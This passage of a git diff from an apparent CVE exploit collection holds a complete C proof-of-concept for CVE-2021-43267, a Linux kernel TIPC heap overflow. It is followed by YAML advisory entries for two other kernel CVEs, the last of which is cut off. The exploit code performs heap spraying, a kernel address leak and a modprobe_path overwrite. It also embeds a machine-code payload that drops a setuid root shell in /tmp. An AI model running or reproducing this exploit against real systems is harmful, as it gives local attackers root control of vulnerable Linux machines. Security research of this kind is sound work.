BODY_SIZE, MTYPE, 0) < 0) { - perror("msgrcv"); - fatal("failed to peek message in queue %d", i); - } - } - - info("tipc bug trigger"); - - uint64_t hacked_msg[4]={ - 0, // m_list.prev - 0, // m_list.next - MTYPE, // m_type - 0x2000, // m_ts - }; - - tipc_trigger((uint8_t*)hacked_msg, 0x20, ++seqno); - - info("spraying tty_struct\n"); - for(int i = 0; i < SPRAY_TTY_CNT; i++) { - if ((tty_fds[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { - fatal("failed to spray tty_struct %d/%d", i, MSG_COUNT); - } - } - - for(int i = MSG_COUNT-1; i > 0; i--, peek_cnt++) { - int r = msgrcv( - queue_id[i], (void*)peekbuf, 0x2000, 0, MSG_COPY | IPC_NOWAIT - ); - - if (r < 0 || r == BODY_SIZE) { - continue; - } - - info("we corrupted a msg_msg size field! (took %d peeks)\n", peek_cnt); - - for(int j = 0; j < r; j += 4) { - if (*(uint32_t*)(peekbuf + j) != TTY_MAGIC) { - continue; - } - - info("found tty_struct at offset 0x%x", j); - pty_ops = read64(peekbuf + j + 0x18); - mybuf = read64(peekbuf + j + 0x40) - 0x408; - - info_value64("pty_ops", pty_ops); - info_value64("our buffer", mybuf); - - memcpy(fake_tty, peekbuf + j, 0x20); - write64(fake_tty + 0x18, mybuf + NEXT_OFFSET); - - // did we hit a master of slave ops ptr? - switch(pty_ops & 0xfff) { - case PTM_UNIX98_OPS & 0xfff: - kernel_base = pty_ops - PTM_UNIX98_OPS; - break; - - case PTS_UNIX98_OPS & 0xfff: - kernel_base = pty_ops - PTS_UNIX98_OPS; - break; - - default: - fatal("this should never happen tbh"); - break; - } - - info_value64("kernel base", kernel_base); - break; - } - - if (pty_ops != 0) { - break; - } else { - info("too bad, tty_struct didnt follow corrupted msg_msg."); - } - } - - if (pty_ops == 0) { - for(int i =0; i < SPRAY_TTY_CNT; i++) { - close(tty_fds[i]); - } - - fatal("infoleak failed. try again?"); - } - - info_value64("modprobe_path", kernel_base + MODPROBE_PATH); - - dummy.type = MTYPE; - for(int i = 0; i < BODY_SIZE; i+=8) { - write64(dummy.body + i, kernel_base + GADGET_RET); - } - write64(dummy.body + 0x60, kernel_base + GADGET_WRITE32); - - info("spray fake pty ops vtable"); - for(int i = 0; i < MSG_COUNT; i++) { - for(int j = 0; j < 8; j++) { - if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message %d", i); - } - } - } - - int hacked = 0; - - dummy.type = MTYPE; - for(int try = 0; try < TRIES_MAX; try++) { - info("attempting to corrupt tty_struct (try %d)", try); - - if (msgsnd(queue_id_final, (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message"); - } - - if ((tty_fds[0] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { - fatal("failed to alloc tty_struct"); - } - - if(msgrcv(queue_id_final, (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { - perror("msgrcv"); - fatal("failed to receive message"); - } - - tipc_trigger(fake_tty, 0x20, ++seqno); - - int r = 0; - r = ioctl(tty_fds[0], 0x706d742f, kernel_base + MODPROBE_PATH); - if (r == 0) { - info("maybe I have some good news.."); - r = ioctl(tty_fds[0], 0x7861682f, kernel_base + MODPROBE_PATH + 4); - hacked = 1; - break; - } else { - close(tty_fds[0]); - } - } - - if (!hacked) { - fatal("hacking computer failed."); - } - - info("triggering modprobe\n"); - system("/tmp/benign"); - sleep(1); - - info("popping shell\n"); - system("/tmp/sh"); - - for(int j = 0; j < SPRAY_TTY_CNT; j++) { - close(tty_fds[j]); - } - - return 0; +/* + * Local PoC exploit for CVE-2021-43267 [1] + * + * I want to see someone make a remote exploit for this. + * + * Only really tested on my local copy of 5.15. But given that you need the + * TIPC module loaded it is unlikely scriptkiddies will have a use for this. + * + * Exploit is a bit CTF quality. Feel free to send me revised copies. + * + * Enjoy! + * + * [1] https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow- + * allows-arbitrary-code-execution/ + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// these are offsets for my kernel, not yours +#define PTM_UNIX98_OPS 0x127f840 // \__ no exported syms, look for xref to str +#define PTS_UNIX98_OPS 0x127f960 // / `Couldn't allocate Unix98 ptm driver` +#define MODPROBE_PATH 0x16500E0 // has symbol +#define GADGET_WRITE32 0x2c51f5 // 31 c0 48 89 32 c3 +#define GADGET_RET 0x2c51fa // c3 + +// good numbers +#define KEY_SIZE 956 +#define MSG_COUNT 2048 +#define BODY_SIZE 976 +#define SMASH_SIZE 32 +#define TRIES_MAX 8 +#define NEXT_OFFSET 0x8000 + +// some constants +#define NODE_ID 0x11223344 +#define MTYPE 0xAB /* Ac1db34v3rz */ +#define SPRAY_TTY_CNT 0x40 +#define TTY_MAGIC 0x5401 +#define TIPC_UDP_PORT 6118 +#define MSG_COPY 040000 + +// TIPC crap +#define TIPC_VERSION 2 + +// user messages +#define LINK_PROTOCOL 7 +#define LINK_CONFIG 13 + +// message types +#define STATE_MSG 0 +#define RESET_MSG 1 +#define ACTIVATE_MSG 2 +#define MSG_CRYPTO 14 + +// media types +#define MEDIA_TYPE_UDP 3 + +// w0 +#define hdr_msg_size(v) ((v) & 0x1ffff) +#define hdr_size(v) ((v & 0xf) << 21) +#define hdr_user(v) ((v & 0xf) << 25) +#define hdr_nonseq(v) ((v & 1) << 20) +#define hdr_version(v) ((v & 7) << 29) + +// w1 +#define hdr_msg_type(v) ((v & 7) << 29) + +// w2 +#define hdr_link_level_seq(v) (v & 0xffff) + +// w4 +#define hdr_next_send_pkt(v) (v & 0xffff) + +// w5 +#define hdr_media_id(v) (v & 0xff) +#define hdr_session_number(v) ((v & 0xffff) << 16) + +// prototypes +struct message_t { + long type; + uint8_t body[BODY_SIZE]; +}; + +// globals +int g_sockfd = 0; +struct sockaddr_in g_sockaddr; + +// utility +#define info(fmt, args...) report('$', false, fmt, ## args) +#define infov(fmt, args...) report('~', false, fmt, ## args) +#define maybe(fmt, args...) report('?', false, fmt, ## args) +#define fatal(fmt, args...) report('!', true, fmt, ## args) +#define info_value64(name, value) infov("%-24s: %016lx", name, value) + +void report(char indicator, bool error, const char *fmt, ...) { + FILE *stream = (error) ? stderr : stdout; + va_list a; + va_start(a, fmt); + fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : ""); + vfprintf(stream, fmt, a); + fprintf(stream, "\n"); + va_end(a); + + if (error) { + exit(-1); // all errors are fatal + } +} + +void usage(char *prog) { + printf("usage: %s \n\n", prog); +} + +static inline void write64(uint8_t *p, uint64_t v) { + *(uint64_t*)(p) = v; +} + +static inline uint64_t read64(uint8_t *p) { + return *(uint64_t*)(p); +} + +#define be32 htonl + +// netlink +int netlink_send( + uint16_t type, uint16_t flags, uint32_t seq, + uint8_t* pkt, size_t pkt_len, + uint8_t **reply_buf, size_t *reply_sz +) { + int sock_fd; + struct sockaddr_nl sa; + memset(&sa, 0, sizeof(struct sockaddr_nl)); + sa.nl_family = AF_NETLINK; + + size_t pkt_full_len = sizeof(struct nlmsghdr) + pkt_len; + uint8_t *pkt_full = malloc(pkt_full_len); + memset(pkt_full, 0, pkt_full_len); + memcpy(pkt_full + sizeof(struct nlmsghdr), pkt, pkt_len); + + struct nlmsghdr *netlink_hdr = (struct nlmsghdr*)(pkt_full); + netlink_hdr->nlmsg_len = pkt_full_len; + netlink_hdr->nlmsg_type = type; + netlink_hdr->nlmsg_flags = flags; + netlink_hdr->nlmsg_seq = seq; + netlink_hdr->nlmsg_pid = getpid(); + + if ((sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC)) < 0) { + perror("socket"); + return -1; + } + + if (bind(sock_fd, (struct sockaddr*)&sa, sizeof(sa)) < 0) { + perror("bind"); + return -1; + } + + ssize_t r = sendto( + sock_fd, pkt_full, pkt_full_len, 0, + (struct sockaddr*)&sa, sizeof(struct sockaddr_nl) + ); + + if (r < 0) { + perror("sendto"); + return -1; + } + + free(pkt_full); + + if (reply_buf != NULL) { + struct msghdr m; + memset(&m, 0, sizeof(struct msghdr)); + m.msg_iovlen = 1; + m.msg_iov = malloc(sizeof(struct iovec)); + m.msg_iov->iov_base = malloc(0x1000); + m.msg_iov->iov_len = 0x1000; + + size_t nread; + + if ((nread = recvmsg(sock_fd, &m, 0)) < 0) { + goto error; + } + + if (m.msg_iovlen != 1) { + goto error; + } + + *reply_sz = nread; + *reply_buf = malloc(*reply_sz); + memcpy(*reply_buf, m.msg_iov->iov_base, *reply_sz); + free(m.msg_iov->iov_base); + } + + close(sock_fd); + return 0; + +error: + close(sock_fd); + return -1; +} + +int netlink_enable_tipc_udp(char *str_ip_address) { + uint8_t pkt_ctrl[]={ + 0x03, 0x01, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, + 0x10, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x02, 0x00, + 0x54, 0x49, 0x50, 0x43, 0x76, 0x32, 0x00, 0x00 + }; + + uint8_t *nl_reply; + size_t nl_reply_len = 0; + uint32_t ip_addr; + uint32_t seq; + int r; + + seq = time(NULL); + + ip_addr = inet_addr(str_ip_address); + if (ip_addr == INADDR_NONE) { + fatal("invalid ip address given"); + } + + r = netlink_send( + NLMSG_MIN_TYPE, (NLM_F_REQUEST | NLM_F_ACK), seq, + pkt_ctrl, sizeof(pkt_ctrl), &nl_reply, &nl_reply_len + ); + + if(r < 0) { + fatal("failed to send netlink control message."); + } + + if (nl_reply_len == 0) { + fatal("did not get netlink control message reply."); + } + + if (*(uint32_t*)(nl_reply + 0x10) == 0xfffffffe) { + fatal("tipc support not available."); + } + + uint16_t nlmsg_type = 0; + off_t pos = 0x14; + + while(pos < nl_reply_len - 4) { + struct nlattr *attr = (struct nlattr*)(nl_reply + pos); + if (attr->nla_type == 1) { + nlmsg_type = *(uint16_t*)(nl_reply + pos + 4); + break; + } + pos += attr->nla_len; + if ((attr->nla_len % 4) != 0) { + pos += 4 - (attr->nla_len % 4); + } + } + + if (nlmsg_type == 0) { + fatal("could not find tipc netlink message type."); + } + + uint8_t pkt_tipc_enable_udp[]={ + 0x03, 0x01, 0x00, 0x00, 0x40, 0x00, 0x01, 0x80, + 0x0d, 0x00, 0x01, 0x00, 0x75, 0x64, 0x70, 0x3a, + 0x55, 0x44, 0x50, 0x31, 0x00, 0x00, 0x00, 0x00, + 0x2c, 0x00, 0x04, 0x80, 0x14, 0x00, 0x01, 0x00, + 0x02, 0x00, 0x17, 0xe6, 0x00, 0x00, 0x00, 0x00, // <-- +0x24 = ip + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x14, 0x00, 0x02, 0x00, 0x02, 0x00, 0x17, 0xe6, + 0xe4, 0x00, 0x12, 0x67, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00 + }; + + *(uint32_t*)(pkt_tipc_enable_udp + 0x24) = ip_addr; + + r = netlink_send( + nlmsg_type, (NLM_F_REQUEST | NLM_F_ACK), seq, + pkt_tipc_enable_udp, sizeof(pkt_tipc_enable_udp), NULL, NULL + ); + + if (r < 0) { + fatal("failed to send netlink tipc udp enable message."); + } + + // the right way is to read back a netlink reply and check if this worked.. + // I chose to go with the scientifically proven method of big chillin' + sleep(2); + + return 0; +} + +// tipc packet routines +void gen_tipc_hdr( + uint8_t *o, + uint32_t w0, uint32_t w1, uint32_t w2, + uint32_t w3, uint32_t w4, uint32_t w5 +) { + uint32_t* o32 = (uint32_t*)o; + o32[0] = be32(w0); + o32[1] = be32(w1); + o32[2] = be32(w2); + o32[3] = be32(w3); + o32[4] = be32(w4); + o32[5] = be32(w5); +} + +ssize_t tipc_send(uint8_t *buf, size_t sz) { + return sendto( + g_sockfd, buf, sz, 0, (struct sockaddr*)&g_sockaddr, sizeof(g_sockaddr) + ); +} + +void tipc_discover() { + uint32_t w0, w1, w2, w3, w4, w5; + uint8_t pkt[24]; + w0 = 0; + w0 |= hdr_version(TIPC_VERSION); + w0 |= hdr_size(6); + w0 |= hdr_msg_size(24); + w0 |= hdr_user(LINK_CONFIG); + w0 |= hdr_nonseq(1); + w1 = 0; + w2 = 0; + w3 = NODE_ID; + w4 = 0x1267; + w5 = hdr_media_id(MEDIA_TYPE_UDP); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + tipc_send(pkt, sizeof(pkt)); +} + +void tipc_link_state_a(uint32_t ip) { + uint8_t pkt[56]; + uint32_t *body = (uint32_t*)(pkt + 24); + uint32_t w0, w1, w2, w3, w4, w5; + + memset(pkt, 0, sizeof(pkt)); + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(10); + w0 |= hdr_user(LINK_PROTOCOL); + w0 |= hdr_msg_size(56); + w1 = hdr_msg_type(RESET_MSG); + w2 = hdr_link_level_seq(0x8000); + w3 = NODE_ID; + w4 = hdr_next_send_pkt(1); + w5 = hdr_session_number(50388); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + int pos = 0; + body[pos++] = be32(NODE_ID); + body[pos++] = be32(ip); + body[pos++] = 0; + body[pos++] = be32(3500 << 16); + memcpy(body + 4, "UDP1", 4); + tipc_send(pkt, sizeof(pkt)); +} + +void tipc_link_state_b(uint32_t ip) { + uint8_t pkt[44]; + uint32_t w0, w1, w2, w3, w4, w5; + uint32_t *body = (uint32_t*)(pkt + 24); + + memset(pkt, 0, sizeof(pkt)); + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(10); + w0 |= hdr_user(LINK_PROTOCOL); + w0 |= hdr_msg_size(44); + w1 = hdr_msg_type(STATE_MSG); + w2 = hdr_link_level_seq(1); + w3 = NODE_ID; + w4 = hdr_next_send_pkt(1); + w5 = hdr_session_number(50388); + + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + int pos = 0; + body[pos++] = be32(NODE_ID); + body[pos++] = be32(ip); + body[pos++] = 0; // timestamp + body[pos++] = 0; // max pkt/link tolerance + body[pos++] = 0; // bearer instance + tipc_send(pkt, sizeof(pkt)); +} + +int tipc_link_setup(char *host) { + if ((g_sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + perror("socket"); + return -1; + } + + memset((char *) &g_sockaddr, 0, sizeof(g_sockaddr)); + g_sockaddr.sin_family = AF_INET; + g_sockaddr.sin_port = htons(TIPC_UDP_PORT); + + if (inet_aton(host, &g_sockaddr.sin_addr) == 0) { + perror("inet_aton"); + return -1; + } + + tipc_discover(); + tipc_link_state_a(be32(inet_addr(host))); + tipc_link_state_b(be32(inet_addr(host))); + + return 0; +} + +void tipc_trigger(uint8_t *smashbuf, uint32_t smashlen, int seqno) { + uint8_t pkt[0x1000]; + uint32_t w0, w1, w2, w3, w4, w5; + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(6); + w0 |= hdr_user(MSG_CRYPTO); + w0 |= hdr_msg_size(24 + 36 + KEY_SIZE); + w1 = 0; + w2 = seqno; + w3 = NODE_ID; + w4 = 0; + w5 = 0; + + memset(pkt, 0, sizeof(pkt)); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + memcpy(pkt+24, "HAXX", 4); + *(uint32_t*)(pkt+24+32) = be32(KEY_SIZE + SMASH_SIZE + smashlen); + memset(pkt+24+36, 'C', KEY_SIZE); + memset(pkt+24+36+KEY_SIZE, 'D', SMASH_SIZE); + memcpy(pkt+24+36+KEY_SIZE + SMASH_SIZE, smashbuf, smashlen); + tipc_send(pkt, sizeof(pkt)); +} + +int setup_modprobe_hax() { + // small ELF file matroshka doll that does; + // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); + // write(fd, elfcode, elfcode_len) + // chmod("/tmp/sh", 04755) + // close(fd); + // exit(0); + // + // the dropped ELF simply does: + // setuid(0); + // setgid(0); + // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); + unsigned char elfcode[] = { + 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, + 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, + 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, + 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, + 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, + 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, + 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, + 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, + 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, + 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, + 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, + 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, + 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, + 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, + 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, + 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 + }; + + FILE *fp; + + fp = fopen("/tmp/benign", "wb"); + if (fp == NULL) { + perror("fopen"); + return -1; + } + + if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) { + perror("fwrite"); + return -1; + } + fclose(fp); + + fp = fopen("/tmp/hax", "wb"); + if (fp == NULL) { + perror("fopen"); + return -1; + } + + if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) { + perror("fwrite"); + return -1; + } + fclose(fp); + + if (chmod("/tmp/benign", 0777) < 0) { + perror("chmod"); + return -1; + } + + if (chmod("/tmp/hax", 0777) < 0) { + perror("chmod"); + return -1; + } + + return 0; +} + +int main(int argc, char *argv[]) { + uint64_t pty_ops = 0; + uint64_t mybuf = 0; + uint64_t kernel_base = 0; + + uint8_t fake_tty[0x20]; + uint8_t peekbuf[0x2000]; + + int peek_cnt = 1; + int seqno=0; + + int tty_fds[SPRAY_TTY_CNT]; + int queue_id[MSG_COUNT]; + int queue_id_final = 0; + + struct message_t dummy; + dummy.type = MTYPE; + memset(dummy.body, 0x58, BODY_SIZE); + + fprintf(stdout, + "\n" + " $$$ Linux 5.10-5.15 CVE-2021-43267 exploit $$$\n" + " -- by blasty --\n\n" + ); + + if (argc != 2) { + usage(argv[0]); + return -1; + } + + info("enabling tipc udp media"); + if (netlink_enable_tipc_udp(argv[1]) < 0) { + fatal("failed to enable tipc udp media"); + } + + info("establish tipc link"); + if (tipc_link_setup(argv[1]) < 0) { + fatal("failed to establish tipc link"); + } + + info("installing helpers"); + if (setup_modprobe_hax() < 0) { + fatal("failed to setup helpers"); + } + + info("create messages queues"); + if ((queue_id_final = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { + perror("msgget"); + fatal("failed to create message queue"); + } + + for(int i = 0; i < MSG_COUNT; i++) { + if ((queue_id[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { + perror("msgget"); + fatal("failed to create message queue %d", i); + } + } + + info("spray messages"); + for(int i = 0; i < MSG_COUNT; i++) { + if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message in queue %d", i); + } + } + + info("poking holes"); + for(int i = 0; i < MSG_COUNT; i += 2) { + if(msgrcv(queue_id[i], (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { + perror("msgrcv"); + fatal("failed to peek message in queue %d", i); + } + } + + info("tipc bug trigger"); + + uint64_t hacked_msg[4]={ + 0, // m_list.prev + 0, // m_list.next + MTYPE, // m_type + 0x2000, // m_ts + }; + + tipc_trigger((uint8_t*)hacked_msg, 0x20, ++seqno); + + info("spraying tty_struct\n"); + for(int i = 0; i < SPRAY_TTY_CNT; i++) { + if ((tty_fds[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { + fatal("failed to spray tty_struct %d/%d", i, MSG_COUNT); + } + } + + for(int i = MSG_COUNT-1; i > 0; i--, peek_cnt++) { + int r = msgrcv( + queue_id[i], (void*)peekbuf, 0x2000, 0, MSG_COPY | IPC_NOWAIT + ); + + if (r < 0 || r == BODY_SIZE) { + continue; + } + + info("we corrupted a msg_msg size field! (took %d peeks)\n", peek_cnt); + + for(int j = 0; j < r; j += 4) { + if (*(uint32_t*)(peekbuf + j) != TTY_MAGIC) { + continue; + } + + info("found tty_struct at offset 0x%x", j); + pty_ops = read64(peekbuf + j + 0x18); + mybuf = read64(peekbuf + j + 0x40) - 0x408; + + info_value64("pty_ops", pty_ops); + info_value64("our buffer", mybuf); + + memcpy(fake_tty, peekbuf + j, 0x20); + write64(fake_tty + 0x18, mybuf + NEXT_OFFSET); + + // did we hit a master of slave ops ptr? + switch(pty_ops & 0xfff) { + case PTM_UNIX98_OPS & 0xfff: + kernel_base = pty_ops - PTM_UNIX98_OPS; + break; + + case PTS_UNIX98_OPS & 0xfff: + kernel_base = pty_ops - PTS_UNIX98_OPS; + break; + + default: + fatal("this should never happen tbh"); + break; + } + + info_value64("kernel base", kernel_base); + break; + } + + if (pty_ops != 0) { + break; + } else { + info("too bad, tty_struct didnt follow corrupted msg_msg."); + } + } + + if (pty_ops == 0) { + for(int i =0; i < SPRAY_TTY_CNT; i++) { + close(tty_fds[i]); + } + + fatal("infoleak failed. try again?"); + } + + info_value64("modprobe_path", kernel_base + MODPROBE_PATH); + + dummy.type = MTYPE; + for(int i = 0; i < BODY_SIZE; i+=8) { + write64(dummy.body + i, kernel_base + GADGET_RET); + } + write64(dummy.body + 0x60, kernel_base + GADGET_WRITE32); + + info("spray fake pty ops vtable"); + for(int i = 0; i < MSG_COUNT; i++) { + for(int j = 0; j < 8; j++) { + if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message %d", i); + } + } + } + + int hacked = 0; + + dummy.type = MTYPE; + for(int try = 0; try < TRIES_MAX; try++) { + info("attempting to corrupt tty_struct (try %d)", try); + + if (msgsnd(queue_id_final, (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message"); + } + + if ((tty_fds[0] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { + fatal("failed to alloc tty_struct"); + } + + if(msgrcv(queue_id_final, (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { + perror("msgrcv"); + fatal("failed to receive message"); + } + + tipc_trigger(fake_tty, 0x20, ++seqno); + + int r = 0; + r = ioctl(tty_fds[0], 0x706d742f, kernel_base + MODPROBE_PATH); + if (r == 0) { + info("maybe I have some good news.."); + r = ioctl(tty_fds[0], 0x7861682f, kernel_base + MODPROBE_PATH + 4); + hacked = 1; + break; + } else { + close(tty_fds[0]); + } + } + + if (!hacked) { + fatal("hacking computer failed."); + } + + info("triggering modprobe\n"); + system("/tmp/benign"); + sleep(1); + + info("popping shell\n"); + system("/tmp/sh"); + + for(int j = 0; j < SPRAY_TTY_CNT; j++) { + close(tty_fds[j]); + } + + return 0; } \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml index 15bc9b531d0ec38d85248ec0857c5106f7d22b69..18d4c2aee67cf0b460a91fbe347c5e0b30017f96 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml @@ -1,20 +1,20 @@ -id: CVE-2021-4154 -source: https://github.com/Markakd/CVE-2021-4154 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system. - scope-of-influence: - Linux Kernel versions prior to 5.14 rc2 - reference: - - https://bugzilla.redhat.com/show_bug.cgi?id=2034514 - - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id... - - https://security.netapp.com/advisory/ntap-20220225-0004/ - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-4154 - cwe-id: CWE-416 +id: CVE-2021-4154 +source: https://github.com/Markakd/CVE-2021-4154 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system. + scope-of-influence: + Linux Kernel versions prior to 5.14 rc2 + reference: + - https://bugzilla.redhat.com/show_bug.cgi?id=2034514 + - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id... + - https://security.netapp.com/advisory/ntap-20220225-0004/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-4154 + cwe-id: CWE-416 tags: cve2021, 内存错误引用 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml index e34d9dd16e4f24bb4117e2ec45106b376d5e9986..d906d816e7b21b2cc095e4de5dc1b3c800b6f2fb 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml @@ -1,21 +1,21 @@ -id: CVE-2021-42008 -source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access - scope-of-influence: - Linux 2.1.94~v5.13.12 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42008 - - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13 - - https://www.youtube.com/watch?v=d5f9xLK8Vhw - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 